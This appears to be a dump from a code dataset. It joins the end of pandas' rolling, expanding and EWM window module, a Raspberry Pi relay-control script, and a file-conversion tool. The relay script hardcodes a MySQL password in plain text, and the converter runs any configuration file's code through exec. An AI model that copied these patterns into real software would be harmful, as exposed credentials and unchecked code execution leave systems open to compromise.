-0.246845 0.211596 -0.901819 5 2.463718 3.157577 -1.380906 6 -1.142255 2.340594 -0.039875 7 1.396598 -1.647453 1.677227 8 -0.543425 1.761277 -0.220481 9 -0.640505 0.289374 -1.550670 >>> df.rolling(3).sum() A B C 0 NaN NaN NaN 1 NaN NaN NaN 2 -2.655105 0.637799 -2.135068 3 -0.971785 -0.600366 -3.280224 4 -0.214334 -1.294599 -3.227500 5 1.514216 2.028250 -2.989060 6 1.074618 5.709767 -2.322600 7 2.718061 3.850718 0.256446 8 -0.289082 2.454418 1.416871 9 0.212668 0.403198 -0.093924 >>> df.rolling(3).agg({'A':'sum', 'B':'min'}) A B 0 NaN NaN 1 NaN NaN 2 -2.655105 -0.165272 3 -0.971785 -1.340923 4 -0.214334 -1.340923 5 1.514216 -1.340923 6 1.074618 0.211596 7 2.718061 -1.647453 8 -0.289082 -1.647453 9 0.212668 -1.647453 See also -------- pandas.Series.rolling pandas.DataFrame.rolling """) @Appender(_agg_doc) @Appender(_shared_docs['aggregate'] % dict( versionadded='', klass='Series/DataFrame')) def aggregate(self, arg, *args, **kwargs): return super(Rolling, self).aggregate(arg, *args, **kwargs) agg = aggregate @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['count']) def count(self): # different impl for freq counting if self.is_freq_type: return self._apply('roll_count', 'count') return super(Rolling, self).count() @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['apply']) def apply(self, func, args=(), kwargs={}): return super(Rolling, self).apply(func, args=args, kwargs=kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['sum']) def sum(self, *args, **kwargs): nv.validate_rolling_func('sum', args, kwargs) return super(Rolling, self).sum(*args, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['max']) def max(self, *args, **kwargs): nv.validate_rolling_func('max', args, kwargs) return super(Rolling, self).max(*args, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['min']) def min(self, *args, **kwargs): nv.validate_rolling_func('min', args, kwargs) return super(Rolling, self).min(*args, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['mean']) def mean(self, *args, **kwargs): nv.validate_rolling_func('mean', args, kwargs) return super(Rolling, self).mean(*args, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['median']) def median(self, **kwargs): return super(Rolling, self).median(**kwargs) @Substitution(name='rolling') @Appender(_shared_docs['std']) def std(self, ddof=1, *args, **kwargs): nv.validate_rolling_func('std', args, kwargs) return super(Rolling, self).std(ddof=ddof, **kwargs) @Substitution(name='rolling') @Appender(_shared_docs['var']) def var(self, ddof=1, *args, **kwargs): nv.validate_rolling_func('var', args, kwargs) return super(Rolling, self).var(ddof=ddof, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['skew']) def skew(self, **kwargs): return super(Rolling, self).skew(**kwargs) _agg_doc = dedent(""" Examples -------- The example below will show a rolling calculation with a window size of four matching the equivalent function call using `scipy.stats`. >>> arr = [1, 2, 3, 4, 999] >>> fmt = "{0:.6f}" # limit the printed precision to 6 digits >>> import scipy.stats >>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False))) -1.200000 >>> print(fmt.format(scipy.stats.kurtosis(arr[1:], bias=False))) 3.999946 >>> s = pd.Series(arr) >>> s.rolling(4).kurt() 0 NaN 1 NaN 2 NaN 3 -1.200000 4 3.999946 dtype: float64 """) @Appender(_agg_doc) @Substitution(name='rolling') @Appender(_shared_docs['kurt']) def kurt(self, **kwargs): return super(Rolling, self).kurt(**kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['quantile']) def quantile(self, quantile, **kwargs): return super(Rolling, self).quantile(quantile=quantile, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['cov']) def cov(self, other=None, pairwise=None, ddof=1, **kwargs): return super(Rolling, self).cov(other=other, pairwise=pairwise, ddof=ddof, **kwargs) @Substitution(name='rolling') @Appender(_doc_template) @Appender(_shared_docs['corr']) def corr(self, other=None, pairwise=None, **kwargs): return super(Rolling, self).corr(other=other, pairwise=pairwise, **kwargs) class RollingGroupby(_GroupByMixin, Rolling): """ Provides a rolling groupby implementation .. versionadded:: 0.18.1 """ @property def _constructor(self): return Rolling def _gotitem(self, key, ndim, subset=None): # we are setting the index on the actual object # here so our index is carried thru to the selected obj # when we do the splitting for the groupby if self.on is not None: self._groupby.obj = self._groupby.obj.set_index(self._on) self.on = None return super(RollingGroupby, self)._gotitem(key, ndim, subset=subset) def _validate_monotonic(self): """ validate that on is monotonic; we don't care for groupby.rolling because we have already validated at a higher level """ pass class Expanding(_Rolling_and_Expanding): """ Provides expanding transformations. .. versionadded:: 0.18.0 Parameters ---------- min_periods : int, default 1 Minimum number of observations in window required to have a value (otherwise result is NA). center : boolean, default False Set the labels at the center of the window. axis : int or string, default 0 Returns ------- a Window sub-classed for the particular operation Examples -------- >>> df = DataFrame({'B': [0, 1, 2, np.nan, 4]}) B 0 0.0 1 1.0 2 2.0 3 NaN 4 4.0 >>> df.expanding(2).sum() B 0 NaN 1 1.0 2 3.0 3 3.0 4 7.0 Notes ----- By default, the result is set to the right edge of the window. This can be changed to the center of the window by setting ``center=True``. See Also -------- rolling : Provides rolling window calculations ewm : Provides exponential weighted functions """ _attributes = ['min_periods', 'center', 'axis'] def __init__(self, obj, min_periods=1, center=False, axis=0, **kwargs): super(Expanding, self).__init__(obj=obj, min_periods=min_periods, center=center, axis=axis) @property def _constructor(self): return Expanding def _get_window(self, other=None): obj = self._selected_obj if other is None: return (max(len(obj), self.min_periods) if self.min_periods else len(obj)) return (max((len(obj) + len(obj)), self.min_periods) if self.min_periods else (len(obj) + len(obj))) _agg_doc = dedent(""" Examples -------- >>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C']) >>> df A B C 0 -2.385977 -0.102758 0.438822 1 -1.004295 0.905829 -0.954544 2 0.735167 -0.165272 -1.619346 3 -0.702657 -1.340923 -0.706334 4 -0.246845 0.211596 -0.901819 5 2.463718 3.157577 -1.380906 6 -1.142255 2.340594 -0.039875 7 1.396598 -1.647453 1.677227 8 -0.543425 1.761277 -0.220481 9 -0.640505 0.289374 -1.550670 >>> df.ewm(alpha=0.5).mean() A B C 0 -2.385977 -0.102758 0.438822 1 -1.464856 0.569633 -0.490089 2 -0.207700 0.149687 -1.135379 3 -0.471677 -0.645305 -0.906555 4 -0.355635 -0.203033 -0.904111 5 1.076417 1.503943 -1.146293 6 -0.041654 1.925562 -0.588728 7 0.680292 0.132049 0.548693 8 0.067236 0.948257 0.163353 9 -0.286980 0.618493 -0.694496 See also -------- pandas.DataFrame.expanding.aggregate pandas.DataFrame.rolling.aggregate pandas.DataFrame.aggregate """) @Appender(_agg_doc) @Appender(_shared_docs['aggregate'] % dict( versionadded='', klass='Series/DataFrame')) def aggregate(self, arg, *args, **kwargs): return super(Expanding, self).aggregate(arg, *args, **kwargs) agg = aggregate @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['count']) def count(self, **kwargs): return super(Expanding, self).count(**kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['apply']) def apply(self, func, args=(), kwargs={}): return super(Expanding, self).apply(func, args=args, kwargs=kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['sum']) def sum(self, *args, **kwargs): nv.validate_expanding_func('sum', args, kwargs) return super(Expanding, self).sum(*args, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['max']) def max(self, *args, **kwargs): nv.validate_expanding_func('max', args, kwargs) return super(Expanding, self).max(*args, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['min']) def min(self, *args, **kwargs): nv.validate_expanding_func('min', args, kwargs) return super(Expanding, self).min(*args, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['mean']) def mean(self, *args, **kwargs): nv.validate_expanding_func('mean', args, kwargs) return super(Expanding, self).mean(*args, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['median']) def median(self, **kwargs): return super(Expanding, self).median(**kwargs) @Substitution(name='expanding') @Appender(_shared_docs['std']) def std(self, ddof=1, *args, **kwargs): nv.validate_expanding_func('std', args, kwargs) return super(Expanding, self).std(ddof=ddof, **kwargs) @Substitution(name='expanding') @Appender(_shared_docs['var']) def var(self, ddof=1, *args, **kwargs): nv.validate_expanding_func('var', args, kwargs) return super(Expanding, self).var(ddof=ddof, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['skew']) def skew(self, **kwargs): return super(Expanding, self).skew(**kwargs) _agg_doc = dedent(""" Examples -------- The example below will show an expanding calculation with a window size of four matching the equivalent function call using `scipy.stats`. >>> arr = [1, 2, 3, 4, 999] >>> import scipy.stats >>> fmt = "{0:.6f}" # limit the printed precision to 6 digits >>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False))) -1.200000 >>> print(fmt.format(scipy.stats.kurtosis(arr, bias=False))) 4.999874 >>> s = pd.Series(arr) >>> s.expanding(4).kurt() 0 NaN 1 NaN 2 NaN 3 -1.200000 4 4.999874 dtype: float64 """) @Appender(_agg_doc) @Substitution(name='expanding') @Appender(_shared_docs['kurt']) def kurt(self, **kwargs): return super(Expanding, self).kurt(**kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['quantile']) def quantile(self, quantile, **kwargs): return super(Expanding, self).quantile(quantile=quantile, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['cov']) def cov(self, other=None, pairwise=None, ddof=1, **kwargs): return super(Expanding, self).cov(other=other, pairwise=pairwise, ddof=ddof, **kwargs) @Substitution(name='expanding') @Appender(_doc_template) @Appender(_shared_docs['corr']) def corr(self, other=None, pairwise=None, **kwargs): return super(Expanding, self).corr(other=other, pairwise=pairwise, **kwargs) class ExpandingGroupby(_GroupByMixin, Expanding): """ Provides a expanding groupby implementation .. versionadded:: 0.18.1 """ @property def _constructor(self): return Expanding _bias_template = """ Parameters ---------- bias : boolean, default False Use a standard estimation bias correction """ _pairwise_template = """ Parameters ---------- other : Series, DataFrame, or ndarray, optional if not supplied then will default to self and produce pairwise output pairwise : bool, default None If False then only matching columns between self and other will be used and the output will be a DataFrame. If True then all pairwise combinations will be calculated and the output will be a MultiIndex DataFrame in the case of DataFrame inputs. In the case of missing elements, only complete pairwise observations will be used. bias : boolean, default False Use a standard estimation bias correction """ class EWM(_Rolling): r""" Provides exponential weighted functions .. versionadded:: 0.18.0 Parameters ---------- com : float, optional Specify decay in terms of center of mass, :math:`\alpha = 1 / (1 + com),\text{ for } com \geq 0` span : float, optional Specify decay in terms of span, :math:`\alpha = 2 / (span + 1),\text{ for } span \geq 1` halflife : float, optional Specify decay in terms of half-life, :math:`\alpha = 1 - exp(log(0.5) / halflife),\text{ for } halflife > 0` alpha : float, optional Specify smoothing factor :math:`\alpha` directly, :math:`0 < \alpha \leq 1` .. versionadded:: 0.18.0 min_periods : int, default 0 Minimum number of observations in window required to have a value (otherwise result is NA). adjust : boolean, default True Divide by decaying adjustment factor in beginning periods to account for imbalance in relative weightings (viewing EWMA as a moving average) ignore_na : boolean, default False Ignore missing values when calculating weights; specify True to reproduce pre-0.15.0 behavior Returns ------- a Window sub-classed for the particular operation Examples -------- >>> df = DataFrame({'B': [0, 1, 2, np.nan, 4]}) B 0 0.0 1 1.0 2 2.0 3 NaN 4 4.0 >>> df.ewm(com=0.5).mean() B 0 0.000000 1 0.750000 2 1.615385 3 1.615385 4 3.670213 Notes ----- Exactly one of center of mass, span, half-life, and alpha must be provided. Allowed values and relationship between the parameters are specified in the parameter descriptions above; see the link at the end of this section for a detailed explanation. When adjust is True (default), weighted averages are calculated using weights (1-alpha)**(n-1), (1-alpha)**(n-2), ..., 1-alpha, 1. When adjust is False, weighted averages are calculated recursively as: weighted_average[0] = arg[0]; weighted_average[i] = (1-alpha)*weighted_average[i-1] + alpha*arg[i]. When ignore_na is False (default), weights are based on absolute positions. For example, the weights of x and y used in calculating the final weighted average of [x, None, y] are (1-alpha)**2 and 1 (if adjust is True), and (1-alpha)**2 and alpha (if adjust is False). When ignore_na is True (reproducing pre-0.15.0 behavior), weights are based on relative positions. For example, the weights of x and y used in calculating the final weighted average of [x, None, y] are 1-alpha and 1 (if adjust is True), and 1-alpha and alpha (if adjust is False). More details can be found at http://pandas.pydata.org/pandas-docs/stable/computation.html#exponentially-weighted-windows See Also -------- rolling : Provides rolling window calculations expanding : Provides expanding transformations. """ _attributes = ['com', 'min_periods', 'adjust', 'ignore_na', 'axis'] def __init__(self, obj, com=None, span=None, halflife=None, alpha=None, min_periods=0, adjust=True, ignore_na=False, axis=0): self.obj = obj self.com = _get_center_of_mass(com, span, halflife, alpha) self.min_periods = min_periods self.adjust = adjust self.ignore_na = ignore_na self.axis = axis self.on = None @property def _constructor(self): return EWM _agg_doc = dedent(""" Examples -------- >>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C']) >>> df A B C 0 -2.385977 -0.102758 0.438822 1 -1.004295 0.905829 -0.954544 2 0.735167 -0.165272 -1.619346 3 -0.702657 -1.340923 -0.706334 4 -0.246845 0.211596 -0.901819 5 2.463718 3.157577 -1.380906 6 -1.142255 2.340594 -0.039875 7 1.396598 -1.647453 1.677227 8 -0.543425 1.761277 -0.220481 9 -0.640505 0.289374 -1.550670 >>> df.ewm(alpha=0.5).mean() A B C 0 -2.385977 -0.102758 0.438822 1 -1.464856 0.569633 -0.490089 2 -0.207700 0.149687 -1.135379 3 -0.471677 -0.645305 -0.906555 4 -0.355635 -0.203033 -0.904111 5 1.076417 1.503943 -1.146293 6 -0.041654 1.925562 -0.588728 7 0.680292 0.132049 0.548693 8 0.067236 0.948257 0.163353 9 -0.286980 0.618493 -0.694496 See also -------- pandas.DataFrame.rolling.aggregate """) @Appender(_agg_doc) @Appender(_shared_docs['aggregate'] % dict( versionadded='', klass='Series/DataFrame')) def aggregate(self, arg, *args, **kwargs): return super(EWM, self).aggregate(arg, *args, **kwargs) agg = aggregate def _apply(self, func, **kwargs): """Rolling statistical measure using supplied function. Designed to be used with passed-in Cython array-based functions. Parameters ---------- func : string/callable to apply Returns ------- y : type of input argument """ blocks, obj, index = self._create_blocks() results = [] for b in blocks: try: values = self._prep_values(b.values) except TypeError: results.append(b.values.copy()) continue if values.size == 0: results.append(values.copy()) continue # if we have a string function name, wrap it if isinstance(func, compat.string_types): cfunc = getattr(_window, func, None) if cfunc is None: raise ValueError("we do not support this function " "in _window.{0}".format(func)) def func(arg): return cfunc(arg, self.com, int(self.adjust), int(self.ignore_na), int(self.min_periods)) results.append(np.apply_along_axis(func, self.axis, values)) return self._wrap_results(results, blocks, obj) @Substitution(name='ewm') @Appender(_doc_template) def mean(self, *args, **kwargs): """exponential weighted moving average""" nv.validate_window_func('mean', args, kwargs) return self._apply('ewma', **kwargs) @Substitution(name='ewm') @Appender(_doc_template) @Appender(_bias_template) def std(self, bias=False, *args, **kwargs): """exponential weighted moving stddev""" nv.validate_window_func('std', args, kwargs) return _zsqrt(self.var(bias=bias, **kwargs)) vol = std @Substitution(name='ewm') @Appender(_doc_template) @Appender(_bias_template) def var(self, bias=False, *args, **kwargs): """exponential weighted moving variance""" nv.validate_window_func('var', args, kwargs) def f(arg): return _window.ewmcov(arg, arg, self.com, int(self.adjust), int(self.ignore_na), int(self.min_periods), int(bias)) return self._apply(f, **kwargs) @Substitution(name='ewm') @Appender(_doc_template) @Appender(_pairwise_template) def cov(self, other=None, pairwise=None, bias=False, **kwargs): """exponential weighted sample covariance""" if other is None: other = self._selected_obj # only default unset pairwise = True if pairwise is None else pairwise other = self._shallow_copy(other) def _get_cov(X, Y): X = self._shallow_copy(X) Y = self._shallow_copy(Y) cov = _window.ewmcov(X._prep_values(), Y._prep_values(), self.com, int(self.adjust), int(self.ignore_na), int(self.min_periods), int(bias)) return X._wrap_result(cov) return _flex_binary_moment(self._selected_obj, other._selected_obj, _get_cov, pairwise=bool(pairwise)) @Substitution(name='ewm') @Appender(_doc_template) @Appender(_pairwise_template) def corr(self, other=None, pairwise=None, **kwargs): """exponential weighted sample correlation""" if other is None: other = self._selected_obj # only default unset pairwise = True if pairwise is None else pairwise other = self._shallow_copy(other) def _get_corr(X, Y): X = self._shallow_copy(X) Y = self._shallow_copy(Y) def _cov(x, y): return _window.ewmcov(x, y, self.com, int(self.adjust), int(self.ignore_na), int(self.min_periods), 1) x_values = X._prep_values() y_values = Y._prep_values() with np.errstate(all='ignore'): cov = _cov(x_values, y_values) x_var = _cov(x_values, x_values) y_var = _cov(y_values, y_values) corr = cov / _zsqrt(x_var * y_var) return X._wrap_result(corr) return _flex_binary_moment(self._selected_obj, other._selected_obj, _get_corr, pairwise=bool(pairwise)) # Helper Funcs def _flex_binary_moment(arg1, arg2, f, pairwise=False): if not (isinstance(arg1, (np.ndarray, ABCSeries, ABCDataFrame)) and isinstance(arg2, (np.ndarray, ABCSeries, ABCDataFrame))): raise TypeError("arguments to moment function must be of type " "np.ndarray/Series/DataFrame") if (isinstance(arg1, (np.ndarray, ABCSeries)) and isinstance(arg2, (np.ndarray, ABCSeries))): X, Y = _prep_binary(arg1, arg2) return f(X, Y) elif isinstance(arg1, ABCDataFrame): from pandas import DataFrame def dataframe_from_int_dict(data, frame_template): result = DataFrame(data, index=frame_template.index) if len(result.columns) > 0: result.columns = frame_template.columns[result.columns] return result results = {} if isinstance(arg2, ABCDataFrame): if pairwise is False: if arg1 is arg2: # special case in order to handle duplicate column names for i, col in enumerate(arg1.columns): results[i] = f(arg1.iloc[:, i], arg2.iloc[:, i]) return dataframe_from_int_dict(results, arg1) else: if not arg1.columns.is_unique: raise ValueError("'arg1' columns are not unique") if not arg2.columns.is_unique: raise ValueError("'arg2' columns are not unique") with warnings.catch_warnings(record=True): X, Y = arg1.align(arg2, join='outer') X = X + 0 * Y Y = Y + 0 * X with warnings.catch_warnings(record=True): res_columns = arg1.columns.union(arg2.columns) for col in res_columns: if col in X and col in Y: results[col] = f(X[col], Y[col]) return DataFrame(results, index=X.index, columns=res_columns) elif pairwise is True: results = defaultdict(dict) for i, k1 in enumerate(arg1.columns): for j, k2 in enumerate(arg2.columns): if j < i and arg2 is arg1: # Symmetric case results[i][j] = results[j][i] else: results[i][j] = f(*_prep_binary(arg1.iloc[:, i], arg2.iloc[:, j])) from pandas import MultiIndex, concat result_index = arg1.index.union(arg2.index) if len(result_index): # construct result frame result = concat( [concat([results[i][j] for j, c in enumerate(arg2.columns)], ignore_index=True) for i, c in enumerate(arg1.columns)], ignore_index=True, axis=1) result.columns = arg1.columns # set the index and reorder if arg2.columns.nlevels > 1: result.index = MultiIndex.from_product( arg2.columns.levels + [result_index]) result = result.reorder_levels([2, 0, 1]).sort_index() else: result.index = MultiIndex.from_product( [range(len(arg2.columns)), range(len(result_index))]) result = result.swaplevel(1, 0).sort_index() result.index = MultiIndex.from_product( [result_index] + [arg2.columns]) else: # empty result result = DataFrame( index=MultiIndex(levels=[arg1.index, arg2.columns], labels=[[], []]), columns=arg2.columns, dtype='float64') # reset our index names to arg1 names # reset our column names to arg2 names # careful not to mutate the original names result.columns = result.columns.set_names( arg1.columns.names) result.index = result.index.set_names( result_index.names + arg2.columns.names) return result else: raise ValueError("'pairwise' is not True/False") else: results = {} for i, col in enumerate(arg1.columns): results[i] = f(*_prep_binary(arg1.iloc[:, i], arg2)) return dataframe_from_int_dict(results, arg1) else: return _flex_binary_moment(arg2, arg1, f) def _get_center_of_mass(comass, span, halflife, alpha): valid_count = com._count_not_none(comass, span, halflife, alpha) if valid_count > 1: raise ValueError("comass, span, halflife, and alpha " "are mutually exclusive") # Convert to center of mass; domain checks ensure 0 < alpha <= 1 if comass is not None: if comass < 0: raise ValueError("comass must satisfy: comass >= 0") elif span is not None: if span < 1: raise ValueError("span must satisfy: span >= 1") comass = (span - 1) / 2. elif halflife is not None: if halflife <= 0: raise ValueError("halflife must satisfy: halflife > 0") decay = 1 - np.exp(np.log(0.5) / halflife) comass = 1 / decay - 1 elif alpha is not None: if alpha <= 0 or alpha > 1: raise ValueError("alpha must satisfy: 0 < alpha <= 1") comass = (1.0 - alpha) / alpha else: raise ValueError("Must pass one of comass, span, halflife, or alpha") return float(comass) def _offset(window, center): if not is_integer(window): window = len(window) offset = (window - 1) / 2. if center else 0 try: return int(offset) except: return offset.astype(int) def _require_min_periods(p): def _check_func(minp, window): if minp is None: return window else: return max(p, minp) return _check_func def _use_window(minp, window): if minp is None: return window else: return minp def _zsqrt(x): with np.errstate(all='ignore'): result = np.sqrt(x) mask = x < 0 if isinstance(x, ABCDataFrame): if mask.values.any(): result[mask] = 0 else: if mask.any(): result[mask] = 0 return result def _prep_binary(arg1, arg2): if not isinstance(arg2, type(arg1)): raise Exception('Input arrays must be of the same type!') # mask out values, this also makes a common index... X = arg1 + 0 * arg2 Y = arg2 + 0 * arg1 return X, Y # Top-level exports def rolling(obj, win_type=None, **kwds): if not isinstance(obj, (ABCSeries, ABCDataFrame)): raise TypeError('invalid type: %s' % type(obj)) if win_type is not None: return Window(obj, win_type=win_type, **kwds) return Rolling(obj, **kwds) rolling.__doc__ = Window.__doc__ def expanding(obj, **kwds): if not isinstance(obj, (ABCSeries, ABCDataFrame)): raise TypeError('invalid type: %s' % type(obj)) return Expanding(obj, **kwds) expanding.__doc__ = Expanding.__doc__ def ewm(obj, **kwds): if not isinstance(obj, (ABCSeries, ABCDataFrame)): raise TypeError('invalid type: %s' % type(obj)) return EWM(obj, **kwds) ewm.__doc__ = EWM.__doc__
32.09457
95
0.567342
d061022c023c772520a2c32c9195928b8e49807d
639
py
Python
web/setpin.py
siskulous/PiStrip
f980705b90f7e0a397b2e6802121a531a5ff79b6
[ "MIT" ]
null
null
null
web/setpin.py
siskulous/PiStrip
f980705b90f7e0a397b2e6802121a531a5ff79b6
[ "MIT" ]
null
null
null
web/setpin.py
siskulous/PiStrip
f980705b90f7e0a397b2e6802121a531a5ff79b6
[ "MIT" ]
null
null
null
#!/usr/bin/env python from RPi import GPIO import sys import MySQLdb db=MySQLdb.connect(user='webhead', passwd='MonkeyBoneIsATerribleMovie', db='powerstrip', host="localhost") GPIO.setmode(GPIO.BCM) state=int(sys.argv[2]) pin= int(sys.argv[1]) if pin == 1: relay=6 elif pin == 2: relay=13 elif pin == 3: relay=19 elif pin == 4: relay=26 else: print "Invalid relay" sys.exit() ''' gpio.init() gpio.setcfg(relay, gpio.OUTPUT) gpio.output(relay, state) ''' GPIO.setup(relay,GPIO.OUT) GPIO.output(relay,state) q=db.cursor() query="UPDATE outlets SET currentState=%s WHERE oid=%s" q.execute(query, (state, pin)) db.commit() db.close
18.257143
55
0.70892
af991f621d6f2f1ecfae882e8d932673d5d0d7b1
9,114
py
Python
ezconvert/convert.py
blahoink/ezconvert
82403ba5c37f73323709db3de78e18e860e824e0
[ "MIT" ]
null
null
null
ezconvert/convert.py
blahoink/ezconvert
82403ba5c37f73323709db3de78e18e860e824e0
[ "MIT" ]
null
null
null
ezconvert/convert.py
blahoink/ezconvert
82403ba5c37f73323709db3de78e18e860e824e0
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # coding: utf-8 import argparse import csv import io import logging import numpy as np import os import pandas as pd import pkg_resources import sys import yaml from .version import __version__ logger = logging.getLogger('root') provided_converters = [ 'mq2pin', 'mq2pcq', 'mq2psea', 'mq2elutator_trainer', 'mq2tmtc' ] def write_df_to_file(df, headers, out_path): with open(out_path, 'w') as f: f.write(headers) logger.info('Writing output to {} ...'.format(out_path)) df.to_csv(out_path, sep=output_sep, header=False, index=write_row_names, mode='a', quoting=quoting) def convert_files(config_file_name=None, input_list=None, input_files=None, output=None): if config_file_name is None: raise Exception('No configuration file (existing name or file path) provided.') # load vars from the config file if isinstance(config_file_name, io.BufferedReader): config_file = config_file_name.read() config_file_name = 'buffer' elif config_file_name in provided_converters: config_file = pkg_resources.resource_string('ezconvert', '/'.join(('converters', config_file_name + '.py'))) else: logger.info('Loading config file functions from {}.'.format(config_file_name)) with open(config_file_name, 'rb') as f: config_file = f.read() exec(compile(config_file, config_file_name, 'exec'), globals()) # read inputs, either from the input list or from the command line _input = [] if input_list is not None: logger.info('Reading in input files from input list {}.'.format(input_list.name)) with open(input_list.name, 'r') as f: _input = yaml.load(f) else: logger.info('Reading in input files from command line.') _input = [f.name for f in input_files] if len(_input) == 0: raise Exception('No input files provided, either from the input list or the command line.') df = pd.DataFrame() # iterate through each input file provided. for i, f in enumerate(_input): # first expand user or any vars f = os.path.expanduser(f) f = os.path.expandvars(f) logger.info('Reading in input file #{} | {} ...'.format(i+1, f)) dfa = pd.read_csv(f, sep=input_sep, low_memory=False) logger.info('Read {} PSMs'.format(dfa.shape[0])) # track input file with input id dfa['input_id'] = i df = df.append(dfa) # filter observations logger.info('Filtering observations...') # before we filter, assign every row an ID df['id'] = range(0, df.shape[0]) # by default, exclude nothing. we'll use binary ORs (|) to # gradually add more and more observations to this exclude blacklist df['exclude'] = np.repeat(False, df.shape[0]) # run all the filters specified by the list in the input config file # all filter functions are passed df, and the run configuration # after each filter, append it onto the exclusion master list with a bitwise OR # if the filter function returns None, then just ignore it. for i, f in enumerate(filters): logger.info('Applying filter #{}: \"{}\"'.format(i+1, f)) e = filters[f](df) logger.info('Marked {} observations for filtering'.format(np.sum(e))) if e is not None: df['exclude'] = (df['exclude'] | e) logger.info('{} / {} ({:.2%}) observations pass filters'.format(df.shape[0] - df['exclude'].sum(), df.shape[0], (df.shape[0] - df['exclude'].sum()) / df.shape[0])) # apply exclusion filter df = df[~df['exclude']].reset_index(drop=True) # create output frame df_out = pd.DataFrame() # apply transformations logger.info('Transforming data...') for i, t in enumerate(transformations): logger.info('Applying transformation #{}: \"{}\"'.format(i+1, t)) trans = transformations[t] # if transformation is a string, then simply copy the old column # to the new output one if type(trans) is str: df_out[t] = df[trans] # if transformation is a function, and the transformation name # begins with a '__', then apply the transformation over the # entire data frame. # this is useful for doing matrix maths that spans over multiple # columns, or rows, or something that involves more than just one # column. elif callable(trans) and t[0:2] == '__': df_out = trans(df, df_out) # if transformation is a function, then call that function to # generate the new column for the output elif callable(trans): df_out[t] = trans(df, df_out) # if transformation is a constant number, then just set all values # of that name to the specified number # don't have to vectorize, pandas will handle that. elif type(trans) is int or type(trans) is float: df_out[t] = trans else: raise Exception('Invalid transformation type: {}. Please provide either a string or a function'.format(type(trans))) # write headers and weights headers = '' # column headers if write_header: for i, col in enumerate(df_out.columns): if quoting == csv.QUOTE_ALL or quoting == csv.QUOTE_NONNUMERIC: headers += ("\"" + col + "\"") else: headers += col if i != (len(df_out.columns)-1): headers += output_sep headers += '\n' # additional header if 'additional_headers' in globals() and len(additional_headers) > 0: for i, w in enumerate(additional_headers): headers += w if i != (len(weights)-1): headers += output_sep headers += '\n' if output is None: # if none, then return the dataframe return (df_out, headers) else: if 'sep_by' in globals() and type(sep_by) is str: # separate output files based on a certain column if sep_by in df_out.columns: sep_by_vals = df_out[sep_by] elif sep_by in df.columns: sep_by_vals = df[sep_by] else: raise Exception('File separator not found in the columns of either the input file or the transformed output file.') # create the output path if necessary if not os.path.exists(output): logger.info('Path for output folder {} does not exist. Creating...'.format(output)) os.makedirs(output) # get unique categories cats = np.unique(sep_by_vals) logger.info('Splitting observations into separate files by "' + sep_by + '"') logger.info('Categories: [' + ' '.join(cats) + ']') # iterate over each category for c in cats: out_path = os.path.join(output, '{}{}'.format(c, output_type)) logger.info('Saving category file {} to {}'.format(c, out_path)) df_a = df_out.loc[sep_by_vals == c] write_df_to_file(df_a, headers, out_path) else: # if no separation, then write the entire collated df to file logger.info('Saving combined file to {}'.format(output)) write_df_to_file(df_out, headers, output) logger.info('Done!') return None def main(): # load command-line args parser = argparse.ArgumentParser() parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Run in verbose mode. If piping output from stdout to a file, leave this off to exclude all logging messages.') parser.add_argument('--config-file', required=True, type=str, help='One of these converters: [' + ' '.join(provided_converters) + '], or a path to conversion configuration script. See list of converters in converters/ folder') input_group = parser.add_mutually_exclusive_group(required=True) input_group.add_argument('--input-list', type=argparse.FileType('r', encoding='UTF-8'), help='List of input files, in YAML format.') input_group.add_argument('-i', '--input', type=argparse.FileType('r', encoding='UTF-8'), nargs='+', help='List of input files, separated by spaces.') parser.add_argument('--version', action='version', version='%(prog)s {version}'.format(version=__version__), help='Display the program\'s version') parser.add_argument('-o', '--output', type=str, help='Path to output data. Default: Leave empty to print to stdout') args = parser.parse_args() # initialize logger # set up logger for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) logFormatter = logging.Formatter('%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s') logger = logging.getLogger('root') if args.verbose: logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.WARNING) """ if log_to_file: fileHandler = logging.FileHandler(log_file_path, mode='w') fileHandler.setFormatter(logFormatter) logger.addHandler(fileHandler) """ consoleHandler = logging.StreamHandler() consoleHandler.setFormatter(logFormatter) logger.addHandler(consoleHandler) logger.info(' '.join(sys.argv[0:])) (df_out, headers) = convert_files(config_file_name=args.config_file, input_list=args.input_list, input_files=args.input, output=args.output) if args.output is None and df_out is not None: # if none, then just print to stdout print(headers, end='') print(df_out.to_string(header=False, index=write_row_names, sparsify=False)) if __name__ == '__main__': main()
35.189189
168
0.680162
da4f9d8b121d836dfaf33e2ca72158e5135e6a9a
5,491
py
Python
dcodex_carlson/views.py
rbturnbull/dcodex_carlson
e662e58ad38915b10f079075d69adae463dd7ecd
[ "Apache-2.0" ]
null
